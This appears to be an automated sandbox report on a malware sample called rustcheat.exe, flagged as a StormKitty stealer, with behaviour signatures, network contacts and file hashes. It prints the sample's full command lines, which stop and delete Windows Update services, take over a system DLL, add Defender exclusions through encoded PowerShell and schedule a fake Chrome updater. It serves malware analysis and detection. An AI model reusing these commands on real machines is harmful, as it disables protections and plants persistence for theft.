Analysis Overview
SHA256
d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7
Threat Level: Known bad
The file rustcheat.exe was found to be: Known bad.
Malicious Activity Summary
Modifies security service
StormKitty payload
StormKitty
Stops running service(s)
Possible privilege escalation attempt
Downloads MZ/PE file
Modifies file permissions
Executes dropped EXE
VMProtect packed file
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Kills process with taskkill
Modifies system certificate store
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-12 12:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-12 12:40
Reported
2023-08-12 12:43
Platform
win10v2004-20230703-en
Max time kernel
12s
Max time network
19s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\system32\reg.exe | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\rustcheat.exe
"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"
C:\Users\Admin\AppData\Local\Temp\testy.exe
"C:\Users\Admin\AppData\Local\Temp\testy.exe"
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAiACcAKQAgADwAIwBhAGYAZQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAaABzAGkAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AeQBwAHAAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG8AcwBpACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABlAHMAdAB5AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZwBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBkAHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
memory/1496-157-0x0000000000230000-0x0000000000280000-memory.dmp
memory/2576-158-0x0000000000D50000-0x000000000116E000-memory.dmp
memory/1496-159-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/2576-160-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/2576-161-0x000000001CE60000-0x000000001CE70000-memory.dmp
memory/1496-162-0x000000001BDC0000-0x000000001BDD0000-memory.dmp
memory/4668-168-0x0000013F95060000-0x0000013F95082000-memory.dmp
memory/4668-173-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnunhuth.zn0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4668-175-0x0000013F955B0000-0x0000013F955C0000-memory.dmp
memory/4668-174-0x0000013F955B0000-0x0000013F955C0000-memory.dmp
memory/4668-176-0x0000013F955B0000-0x0000013F955C0000-memory.dmp
memory/4668-179-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/1496-180-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/2576-181-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
| MD5 | 6d1c62ec1c2ef722f49b2d8dd4a4df16 |
| SHA1 | 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6 |
| SHA256 | 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c |
| SHA512 | c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2 |
C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll
| MD5 | 7a2d5deab61f043394a510f4e2c0866f |
| SHA1 | ca16110c9cf6522cd7bea32895fd0f697442849b |
| SHA256 | 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69 |
| SHA512 | b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0 |
memory/2576-192-0x000000001CE60000-0x000000001CE70000-memory.dmp
memory/2576-193-0x000000001CD90000-0x000000001CDA2000-memory.dmp
memory/1496-194-0x000000001BDC0000-0x000000001BDD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4744-205-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/4744-206-0x000001831BD60000-0x000001831BD70000-memory.dmp
memory/4744-207-0x000001831BD60000-0x000001831BD70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/4744-209-0x000001831BD60000-0x000001831BD70000-memory.dmp
memory/4744-212-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 5802cd85f72d4d1afcf72d5daeb12e0a |
| SHA1 | 61f7f3cb6dcf20edfb29f56cb6fabe529cc4a59e |
| SHA256 | 91d8fd9f83b068436c733b72e2c128092ce55a56ff936ef6ae042b332ba0edf6 |
| SHA512 | fce715c7aca23d2787f6e38d507ace7c49293b0f73dc8525839eb9736d99b82881a9e4904dae2117c577917d1bc161150119b767e26870521c997378f55c3505 |
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 5802cd85f72d4d1afcf72d5daeb12e0a |
| SHA1 | 61f7f3cb6dcf20edfb29f56cb6fabe529cc4a59e |
| SHA256 | 91d8fd9f83b068436c733b72e2c128092ce55a56ff936ef6ae042b332ba0edf6 |
| SHA512 | fce715c7aca23d2787f6e38d507ace7c49293b0f73dc8525839eb9736d99b82881a9e4904dae2117c577917d1bc161150119b767e26870521c997378f55c3505 |
memory/2296-216-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-12 12:40
Reported
2023-08-12 12:43
Platform
win7-20230712-en
Max time kernel
135s
Max time network
123s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry key
Modifies system certificate store
| Description | Indicator | Process | Target |
